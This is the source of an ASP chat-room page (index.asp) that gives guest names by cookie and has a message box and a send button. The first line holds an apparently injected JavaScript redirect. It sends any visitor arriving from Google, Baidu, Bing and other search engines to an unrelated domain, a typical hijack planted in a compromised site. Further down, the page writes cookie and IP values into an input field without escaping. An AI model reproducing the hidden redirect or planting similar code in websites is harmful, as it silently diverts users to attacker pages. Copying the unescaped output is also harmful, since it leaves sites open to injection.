d:\wwwroot\wuchunhua\liaotiana5\index.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>
<!--#include file="conn.asp"-->
002:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
003:
<html xmlns="http://www.w3.org/1999/xhtml">
004:
<head>
005:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
006:
<title>无标题文档</title>
007:
</head>
008:
009:
<body onload="jss();">
010:
<%
011:
if request.Cookies("user")="" then
012:
sql="insert into us(us) values('"&now()&"')"
013:
'response.Write sql
014:
conn.execute(sql)
015:
set rs=server.CreateObject("adodb.recordset")
016:
rs.open "select * from us",conn,1,1
017:
response.Cookies("user")="游客"&rs.recordcount+1
018:
rs.close
019:
end if
020:
%
>
021:
<p>
022:
<Script language="javascript" src="js.js"></script>
023:
状态:<span id="zt"></span><br />
024:
<br />
025:
<textarea name="textarea" id="textarea" onpropertychange="this.scrollTop=this.scrollHeight" onfocus="this.scrollTop=this.scrollHeight" readonly="readonly" cols="60" rows="20" ></textarea>
026:
<br />
027:
名字:
028:
<input type="text" name="us" id="us" value="
<%
=request.Cookies("user")&",在"&now()&",IP是"&Request.ServerVariables("REMOTE_ADDR")&"对大家说"
%
>" />
029:
<br />
030:
<input name="t" type="text" id="t" onkeydown="if(event.keyCode==13) jsc();" size="60"/>
031:
<input type="button" onclick="jsc();" name="button" id="button" value="发送" />
032:
<!--webbot bot="PurpleText" PREVIEW="暂时不用:因为清屏会跳转到js.js里面,会把数据库全部删除了内容:<input type="button" name="button2" id="button2" onclick="cclse()" value="清屏" />" -->
033:
</p>
034:
<div id="tt"></div>
035:
036:
</body>
037:
</html>
038:
039: